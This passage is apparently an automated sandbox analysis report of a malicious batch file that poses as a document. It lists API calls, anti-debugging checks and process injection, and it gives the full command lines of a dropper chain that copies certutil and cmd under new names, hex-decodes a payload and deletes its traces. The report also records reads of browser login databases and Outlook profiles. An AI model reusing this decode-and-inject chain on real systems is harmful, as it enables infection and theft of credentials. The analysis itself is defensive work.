              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792D7D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,7_2_00007FF792D7D4A4
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792D3D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF792D3D440
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792DB3674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,7_2_00007FF792DB3674
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792D7DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,7_2_00007FF792D7DBC0
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792DD19F8 #359,FindFirstFileW,FindNextFileW,FindClose,7_2_00007FF792DD19F8
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792DD1B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,7_2_00007FF792DD1B04
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792D75E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,7_2_00007FF792D75E58
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792DD234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,7_2_00007FF792DD234C
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792D6C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,7_2_00007FF792D6C6F8
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792DD6F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,7_2_00007FF792DD6F80
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792DD3100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF792DD3100
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792DD10C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF792DD10C4
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_028F58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,10_2_028F58B4
              Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7AB13823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,11_2_00007FF7AB13823C
              Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7AB132978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,11_2_00007FF7AB132978
              Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7AB147B4C FindFirstFileW,FindNextFileW,FindClose,11_2_00007FF7AB147B4C
              Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7AB121560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_00007FF7AB121560
              Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7AB1235B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,11_2_00007FF7AB1235B8
              Source: C:\Users\Public\alpha.exe Code function: 12_2_00007FF7AB13823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,12_2_00007FF7AB13823C
              Source: C:\Users\Public\alpha.exe Code function: 12_2_00007FF7AB132978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,12_2_00007FF7AB132978
              Source: C:\Users\Public\alpha.exe Code function: 12_2_00007FF7AB147B4C FindFirstFileW,FindNextFileW,FindClose,12_2_00007FF7AB147B4C
              Source: C:\Users\Public\alpha.exe Code function: 12_2_00007FF7AB121560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,12_2_00007FF7AB121560
              Source: C:\Users\Public\alpha.exe Code function: 12_2_00007FF7AB1235B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,12_2_00007FF7AB1235B8
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792DB511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,7_2_00007FF792DB511C
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596113
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595985
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595860
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595735
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595610
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595485
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595360
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595235
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595110
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594985
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594860
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594735
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594610
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594485
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594360
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594235
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594110
              Source: spoolsv.COM, 0000000A.00000002.1583110687.00000000007B7000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1583110687.000000000076F000.00000004.00000020.00020000.00000000.sdmp
              Binary or memory string: Hyper-V RAW
              Source: Cneehezx.PIF, 00000012.00000002.1709829518.000000000054B000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2755255782.000000002071C000.00000004.00000020.00020000.00000000.sdmp
              Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@
              Source: xzeheenC.pif, 00000010.00000002.2755700355.0000000029908000.00000004.00000020.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2756654724.0000000030A9D000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000017.00000002.1786215304.0000000000708000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\Public\Libraries\spoolsv.COM API call chain: ExitProcess graph end node
              Source: C:\Users\Public\Libraries\xzeheenC.pif Process information queried: ProcessInformation

              Anti Debugging

              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_0290EBF0 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,10_2_0290EBF0
              Source: C:\Users\Public\Libraries\spoolsv.COM Process queried: DebugPort
              Source: C:\Users\Public\Libraries\Cneehezx.PIF Process queried: DebugPort
              Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF7AB1463FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,4_2_00007FF7AB1463FC
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_029087A0 LoadLibraryW,GetProcAddress,FreeLibrary,10_2_029087A0
              Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF7AB13823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF7AB13823C
              Source: C:\Users\Public\Libraries\xzeheenC.pif Process token adjusted: Debug
              Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF7AB138FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF7AB138FA4
              Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF7AB1393B0 SetUnhandledExceptionFilter,4_2_00007FF7AB1393B0
              Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF7AB138FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF7AB138FA4
              Source: C:\Users\Public\alpha.exe Code function: 6_2_00007FF7AB1393B0 SetUnhandledExceptionFilter,6_2_00007FF7AB1393B0
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792E053E0 SetUnhandledExceptionFilter,7_2_00007FF792E053E0
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792E04E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FF792E04E18
              Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7AB138FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00007FF7AB138FA4
              Source: C:\Users\Public\alpha.exe Code function: 11_2_00007FF7AB1393B0 SetUnhandledExceptionFilter,11_2_00007FF7AB1393B0
              Source: C:\Users\Public\alpha.exe Code function: 12_2_00007FF7AB138FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00007FF7AB138FA4
              Source: C:\Users\Public\alpha.exe Code function: 12_2_00007FF7AB1393B0 SetUnhandledExceptionFilter,12_2_00007FF7AB1393B0
              Source: C:\Users\Public\Libraries\xzeheenC.pif Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\Public\Libraries\spoolsv.COM Memory allocated: C:\Users\Public\Libraries\xzeheenC.pif base: 400000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Cneehezx.PIF Memory allocated: C:\Users\Public\Libraries\xzeheenC.pif base: 400000 protect: page execute and read and write
              Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\kn.exe
              Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe
              Source: C:\Users\Public\Libraries\spoolsv.COM Section unmapped: C:\Users\Public\Libraries\xzeheenC.pif base address: 400000
              Source: C:\Users\Public\Libraries\Cneehezx.PIF Section unmapped: C:\Users\Public\Libraries\xzeheenC.pif base address: 400000
              Source: C:\Users\Public\Libraries\spoolsv.COM Memory written: C:\Users\Public\Libraries\xzeheenC.pif base: 3B6008
              Source: C:\Users\Public\Libraries\Cneehezx.PIF Memory written: C:\Users\Public\Libraries\xzeheenC.pif base: 3E5008
              Source: C:\Users\Public\Libraries\Cneehezx.PIF Memory written: C:\Users\Public\Libraries\xzeheenC.pif base: 330008
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792DB7024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356,7_2_00007FF792DB7024
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
              Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
              Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
              Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\Libraries\spoolsv.COM C:\Users\Public\Libraries\spoolsv.COM
              Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
              Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S
              Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
              Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
              Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
              Source: C:\Users\Public\Libraries\spoolsv.COM Process created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pif
              Source: C:\Users\Public\Libraries\Cneehezx.PIF Process created: C:\Users\Public\Libraries\xzeheenC.pif C:\Users\Public\Libraries\xzeheenC.pif
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792DE72B0 CAFindByName,#359,LocalAlloc,InitializeSecurityDescriptor,GetLastError,SetSecurityDescriptorDacl,GetLastError,GetSecurityDescriptorLength,LocalAlloc,MakeSelfRelativeSD,GetLastError,CASetCASecurity,CAUpdateCAEx,#357,LocalFree,LocalFree,LocalFree,CACloseCA,7_2_00007FF792DE72B0
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792DB4E98 AllocateAndInitializeSid,GetLastError,#357,GetCurrentThread,GetLastError,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,DuplicateToken,GetLastError,CheckTokenMembership,GetLastError,CloseHandle,CloseHandle,FreeSid,7_2_00007FF792DB4E98
              Source: C:\Users\Public\alpha.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,4_2_00007FF7AB1351EC
              Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,4_2_00007FF7AB126EE4
              Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,4_2_00007FF7AB133140
              Source: C:\Users\Public\alpha.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,6_2_00007FF7AB1351EC
              Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,6_2_00007FF7AB126EE4
              Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,6_2_00007FF7AB133140
              Source: C:\Users\Public\kn.exe Code function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,7_2_00007FF792E03800
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,10_2_028F5A78
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: GetLocaleInfoA,10_2_028FA798
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: GetLocaleInfoA,10_2_028FA74C
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,10_2_028F5B84
              Source: C:\Users\Public\alpha.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,11_2_00007FF7AB1351EC
              Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,11_2_00007FF7AB126EE4
              Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,11_2_00007FF7AB133140
              Source: C:\Users\Public\alpha.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,12_2_00007FF7AB1351EC
              Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,12_2_00007FF7AB126EE4
              Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,12_2_00007FF7AB133140
              Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Users\Public\alpha.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Users\Public\Libraries\xzeheenC.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\Public\Libraries\xzeheenC.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\Public\Libraries\xzeheenC.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
              Source: C:\Users\Public\Libraries\xzeheenC.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\Public\Libraries\xzeheenC.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF7AB148654 GetSystemTime,SystemTimeToFileTime,4_2_00007FF7AB148654
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792CF950C ConvertStringSidToSidW,LookupAccountNameW,GetLastError,#359,LocalAlloc,#357,LocalAlloc,LookupAccountNameW,GetLastError,IsValidSid,ConvertSidToStringSidW,GetLastError,LocalFree,LocalFree,7_2_00007FF792CF950C
              Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF7AB12586C GetVersion,4_2_00007FF7AB12586C
              Source: C:\Users\Public\Libraries\xzeheenC.pif Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032B04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032A86000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2757842807.00000000229BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2757407434.000000002B7FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2757842807.00000000229B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2757842807.0000000022A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2757407434.000000002B68C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2757842807.0000000022AB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032D67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2757407434.000000002B7A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032ECC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2757407434.000000002BA5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 6760, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 3428, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 7064, type: MEMORYSTR
              Source: Yara matchFile source: 0000001A.00000002.2757842807.0000000022781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032A4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 6760, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 3428, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xzeheenC.pif PID: 7064, type: MEMORYSTR
              Source: C:\Users\Public\Libraries\xzeheenC.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\Public\Libraries\xzeheenC.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\Public\Libraries\xzeheenC.pif File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
              Source: C:\Users\Public\Libraries\xzeheenC.pif Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

              Remote Access Functionality

              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792D154A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792D35648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792D1227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792D2E568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree
              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Behavior Graph ID: 1577663, Sample: F.O Pump Istek,Docx.bat, Startdate: 18/12/2024, Architecture: WINDOWS, Score: 100

              Source | Detection | Scanner | Label | Link
              F.O Pump Istek,Docx.bat | 24% | ReversingLabs | Script-BAT.Trojan.Heuristic |

              Source | Detection | Scanner | Label | Link
              C:\Users\Public\Libraries\spoolsv.COM | 100% | Avira | HEUR/AGEN.1326111 |
              C:\Users\Public\Libraries\Cneehezx.PIF | 100% | Avira | HEUR/AGEN.1326111 |
              C:\Users\Public\Libraries\xzeheenC.pif | 3% | ReversingLabs | |
              C:\Users\Public\alpha.exe | 0% | ReversingLabs | |
              C:\Users\Public\kn.exe | 0% | ReversingLabs | |

              No Antivirus matches
              No Antivirus matches

              Source | Detection | Scanner | Label | Link
              https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP | 0% | Avira URL Cloud | safe |
              https://%ws/%ws_%ws_%ws/service.svc/%ws | 0% | Avira URL Cloud | safe |
              http://www.pmail.com0 | 0% | Avira URL Cloud | safe |
              http://api.telegram.orgh | 0% | Avira URL Cloud | safe |
              https://api.telegram.orgL | 0% | Avira URL Cloud | safe |
              https://api.telegram | 0% | Avira URL Cloud | safe |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
s3-w.us-east-1.amazonaws.com | 54.231.224.185 | true | false | | high
